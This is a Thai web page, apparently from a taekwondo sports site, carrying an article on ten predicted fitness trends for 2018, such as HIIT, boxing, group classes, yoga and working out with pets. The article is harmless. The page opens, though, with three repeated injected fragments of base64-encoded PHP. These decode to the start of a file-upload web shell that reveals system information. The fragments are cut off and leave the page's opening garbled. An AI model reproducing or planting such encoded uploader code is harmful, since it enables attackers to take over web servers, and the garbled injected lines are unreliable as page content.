".base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5TdHlsZTwvdGl0bGU+JzsgDQplY2hvIHBocF91bmFtZSgpOyANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7IA0KZWNobyAnPGlu ,เทควันโด, Taekwondo"> ".base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5TdHlsZTwvdGl0bGU+JzsgDQplY2hvIHBocF91bmFtZSgpOyANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7IA0KZWNobyAnPGlu,เทควันโด, Taekwondo">

".base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5TdHlsZTwvdGl0bGU+JzsgDQplY2hvIHBocF91bmFtZSgpOyANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7IA0KZWNobyAnPGlu


ออกกำลังกาย
 

          เทรนด์ออกกำลังกายปี 2018 มีวิธีออกกำลังกายแบบไหนที่คาดว่าจะมาแรงบ้าง คนที่ออกกำลังกายเป็นประจำ หรือว่าได้ตั้งปณิธานว่าจะออกกำลังกายอย่างจริงจังในปี 2561 ลองมาดูกันค่ะว่าทั่วโลกกำลังจับตามองเทรนด์ออกกำลังกายแบบไหนกันอยู่

          เห็นได้ชัดว่าในยุคนี้คนรักสุขภาพมีแนวโน้มเพิ่มขึ้นทุกวัน มีคนรักการออกกำลังกายมากขึ้น และแน่นอนว่าเทรนด์การออกกำลังกายใหม่ ๆ ก็มีออกมาอยู่ตลอดทั้งปี แต่ในปีหน้าวิธีออกกำลังกายแบบไหนจะอิน และการออกกำลังกายแบบไหนจะเอาท์ เรามาดูเทรนด์ออกกำลังกายปี 2018 กันดีกว่าค่ะ แนวโน้มจะเป็นยังไง คนรักการออกกำลังกายจับตากันไว้แต่เนิ่น ๆ เลย
 

ออกกำลังกาย


1. ความสนุก+การออกกำลังกาย    

          จะเห็นได้ว่ามีวิธีออกกำลังกายที่พยายามเพิ่มความสนุกเร้าใจลงไปด้วย เช่น คลาสซุมบ้า หรือคาร์ดิโอแดนซ์ เป็นเทรนด์ออกกำลังกายที่มาแรงตั้งแต่ช่วงปี 2015 ทว่าเทรนด์ออกกำลังกายในปี 2018 ก็มีการคาดเดากันค่ะว่า วิธีออกกำลังกายที่เน้นความสนุกในระหว่างการออกกำลังกายจะมาแรงมากขึ้น ยกตัวอย่างเช่น การผสมผสานท่าเต้นบนลู่วิ่ง หรือการกระโดดเชือก ฮูลาฮูป สิ่งที่เป็นการเล่นกึ่งการออกกำลังกายจะรีเทิร์นกลับมาอีกครั้ง แต่จะมีเทคนิคสนุก ๆ อะไรเติมแต่งให้แตกต่างออกไปจากเดิมบ้าง ก็คงต้องรอดูกันต่อไป

2. HIIT ยังฮิตอยู่

          วิธีออกกำลังกายแบบ HIIT หรือ High-Intensity Interval Training เป็นวิธีการออกกำลังกายสไตล์คาร์ดิโอที่ผสมผสานกันระหว่างการออกกำลังกายอย่างหนักและการออกกำลังกายเบา ๆ สลับกันไป ซึ่งการวิจัยที่จัดทำขึ้นโดย The American College of Sports Medicine หรือ ACSM พบว่า การออกกำลังกายชนิดนี้เป็นการออกกำลังกายที่เป็นเทรนด์ออกกำลังยอดนิยมตั้งแต่ปี 2014 และคาดว่าเทรนด์ออกกำลังกาย ปี 2018 ก็ยังจะฮิต HIIT กันอยู่ เนื่องจากค่อนข้างตอบโจทย์ไลฟ์สไตล์ของคนในยุคนี้ ออกกำลังกายไม่กี่นาที แต่เบิร์นแคลอรีได้มากมาย

          - HIIT วิธีออกกำลังกายสูตรเด็ด รีดไขมันได้ใน 20 นาที
 

 
ออกกำลังกาย
 
ภาพจาก unsplash


3. Boxing ดีจริงจนได้อยู่ต่อ

          คาร์ดิโอที่เรียกเหงื่อ เบิร์นแคลอรี และให้ความสนุกปนเหนื่อยได้สุดยอดก็ต้องไว้ใจ Boxing เลยค่ะ เพราะการต่อยมวยได้มูฟเยอะ ได้ออกท่าทางอีกมากมาย แถมยังเล่นได้ทั้งหญิงและชาย คอร์สมวยลดน้ำหนัก หรือฟิตกล้ามเนื้อเลยได้อยู่ต่อ เป็นเทรนด์ออกกำลังกายที่หลายคนยังติดใจในปี 2018

4. คลาสออกกำลังกายแบบกลุ่มก็น่าจับตามอง

          ในปี 2018 เราอาจจะได้เห็นคลาสออกกำลังกายแบบกลุ่มในรูปแบบที่หลากหลายมากขึ้น เพราะอย่างที่บอกค่ะว่า เทรนด์ออกกำลังกายในปี 2018 น่าจะเน้นความสนุกสนานผสมผสานไปกับการออกกำลังกายเพื่อสุขภาพ มากกว่าการออกกำลังกายแบบเดี่ยว ๆ หรือการออกกำลังกายกับเทรนเนอร์ตัวต่อตัว โดยนักสำรวจให้เหตุผลว่า การออกกำลังกายแบบกลุ่มจูงใจให้คนอยากออกกำลังกายได้ดีกว่า อีกทั้งยังเพิ่มความสนุกสนาน และมีการแลกเปลี่ยนเทคนิคการออกกำลังระหว่างกันได้อีกต่างหาก เทรนด์ออกกำลังกายแบบกลุ่มจึงเป็นวิธีออกกำลังกายที่น่าจะบูมไม่เบาในปี 2018
 

ออกกำลังกาย
 
ภาพจาก pixabay


5. เทคโนโลยีจะฮิตกว่าเดิม

          จากการสำรวจของ The American College of Sports Medicine หรือ ACSM เผยให้เห็นว่า ไม่ว่าจะเป็นแอพพลิเคชั่นออกกำลังกาย หรืออุปกรณ์ไอทีที่เกี่ยวกับการออกกำลังกาย จะเป็นที่นิยมมากขึ้นในปี 2018 โดยเราน่าจะได้เห็นคนออกกำลังกายสวมใส่อุปกรณ์ไฮเทคเหล่านี้มากขึ้นกว่าปีที่ผ่าน ๆ มา เนื่องจากเทคโนโลยีที่สร้างขึ้นมาเพื่อช่วยเสริมการออกกำลังกายมีให้เลือกหลากหลายขึ้น ราคาก็เอื้อมถึงมากขึ้น และด้วยการแข่งขันทางการตลาด แต่ละแบรนด์ก็จะมีความพยายามเพิ่มประสิทธิภาพในการใช้งาน คนที่ได้ผลประโยชน์มากสุดก็คือผู้บริโภคอย่างเรา ๆ ได้ของดีในราคาที่เหมาะสม ใครล่ะจะอดใจไม่ซื้อมาใช้ได้

6. ไลฟ์สดท่าออกกำลังกาย

          มาค่ะ ! ปี 2018 เราอาจได้เห็นการไลฟ์สดสอนท่าออกกำลังกาย หรือไลฟ์สดชวนกันออกกำลังกายกันบ้าง และเชื่อว่าเทรนด์นี้ก็น่าจะมาแรงไม่แพ้เทรนด์ใช้เทคโนโลยี เพราะนี่ก็เป็นการใช้ประโยชน์จากเทคโนโลยีในรูปแบบหนึ่งที่สะดวก เซฟค่าใช้จ่าย ออกกำลังกายเองที่บ้านก็ได้อีกต่างหาก

7. ออกกำลังกายกับสัตว์เลี้ยง

          โยคะแมวก็มีให้เห็นบ้างแล้ว หรือจะเป็นการออกกำลังกายไปจิบเบียร์ไปก็ยังมี แต่ในปี 2018 หลายสำนักก็คาดเดากันว่า คนจะนิยมออกกำลังกายกับสัตว์เลี้ยงเพิ่มมากขึ้น เพราะสัตว์เลี้ยงจะช่วยเพิ่มความเพลิดเพลินระหว่างการออกกำลังกาย เหล่าทาสแมว ทาสน้องหมาสี่ขาก็น่าจะแฮปปี้กับการออกกำลังกายในรูปแบบนี้ไม่เบา
 

ออกกำลังกาย
 
ภาพจาก unsplash


8. บอดี้เวทยังติดอันดับ

          บอดี้เวทเป็นวิธีออกกำลังกายที่ไมต่จำเป็นต้องใช้อุปกรณ์ให้ยุ่งยาก เน้นการใช้ร่างกายของเราล้วน ๆ และผลลัพธ์ของการออกกำลังกายแบบบอดี้เวทก็แจ่มซะด้วยสิคะ หลายคนทำแล้วลีน มีกล้ามเนื้อ ลดไขมัน ฟิตหุ่นได้เป๊ะเว่อร์วังแค่ทำบอดี้เวทเป็นประจำ ดังนั้นก็ไม่ต้องแปลกใจหากเทรนด์บอดี้เวทจะได้อยู่ต่ออีกสักปีหรืออีกหลาย ๆ ปี

          - 10 คลิปท่าบอดี้เวทรีดไขมัน เฟิร์มกล้ามเนื้อในเวลาสั้น ๆ แต่ละท่าไม่เกิน 5 นาที
 

ออกกำลังกาย
 
ภาพจาก unsplash


9. โยคะ

          อีกหนึ่งวิธีออกกำลังกายที่ฮิตไม่หยุด ฮอตไม่เลิกก็คือโยคะนี่แหละค่ะ  อาจจะด้วยความที่โยคะเหมาะกับคนทุกวัย แก้ปัญหาสุขภาพได้ และยังเป็นการออกกำลังกายไปในตัว โยคะเลยเป็นทางเลือกการออกกำลังกายเพื่อสุขภาพ พร้อมกับเป็นทางเลือกของคนที่มองหาวิธีออกกำลังกายลดน้ำหนักไปด้วย คุ้มในคุ้มเลยเป็นอีกเทรนด์ออกกำลังกายติดอันดับในปี 2018 ได้ชิล ๆ 

10. ออกกำลังกายยกครัว

          นอกจากเทรนด์ออกกำลังกายเป็นกลุ่มแล้ว ปี 2018 เราอาจได้เห็นการออกกำลังกายแนว Family Workout ที่ทุกคนในบ้านชวนกันมาออกกำลังกายกันมากขึ้น บอกแล้วว่าใคร ๆ ก็รักสุขภาพ รักการออกกำลังกายเพื่อสุขภาพกันทั้งนั้น

          ไม่ว่าจะเป็นเทรนด์ออกกำลังกายแบบไหนก็ตาม เราเชื่อว่าแค่คิดอยากจะออกกำลังกาย มีกำลังใจ มีแรงบันดาลใจ และเริ่มต้นออกกำลังกาย ยังไงสุขภาพที่ดี รูปร่างที่ดี ก็อยู่กับเราแน่นอนค่ะ    

        
ขอขอบคุณข้อมูลจาก
dailymail
businessinsider
wtop

Comments

THANNAM TAEKWONDO SPORT

เรารวบรวมข่าวสาร วงการกีฬาเทควันโด และการกีฬาต่อสู้ MArtial Art ทุกประเภท รวบรวม การแข่งขันในประเภทกีฬาต่าง ระบบการจัดการ สมัครแข่งขันออนไลน์ ในทุกกีฬา.

NEWS UPDATE